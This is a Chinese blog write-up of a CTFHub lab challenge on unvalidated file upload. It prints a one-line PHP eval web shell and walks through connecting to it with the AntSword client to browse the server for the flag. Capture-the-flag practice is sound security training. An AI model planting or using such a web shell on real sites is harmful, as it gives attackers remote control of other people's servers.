文件上传-无验证"/>
CTFHub技能书解题笔记-文件上传-无验证
打开题目
说是无验证。咋也不懂,直接打开看看。
试试直接上传一句话木马。
<?php
echo "hello";
@eval($_POST['shell']);?>
直接成功,这里访问试试。
成了。然后直接蚁剑连接
进行连接。这里的url就是刚才咱们访问shell.php文件的url。连接密码就是中括号里的shell。这里可以随意更改。
然后打开蚁剑,空白处右键添加数据。
输入url和连接密码。点击测试连接。提示成功,就OK了。
点击添加,然后再初始界面,双击我们刚才添加的连接。
接下来就是寻宝了。点了个上层就到了。
这道题就这么结束了。这个就很基础了,主要考的应该是咱们对如何简单进行webshell上传到反弹的整个过程的了解。
这里用到的shell连接工具,可以选择
蚁剑、菜刀、冰蝎等。我比较喜欢蚁剑。
工具的压缩包博主也都有收集。可私信提供,下载的时候忘了保存链接,所以没法给大家贴上传送门。
更多推荐
CTFHub技能书解题笔记-文件上传-无验证
发布评论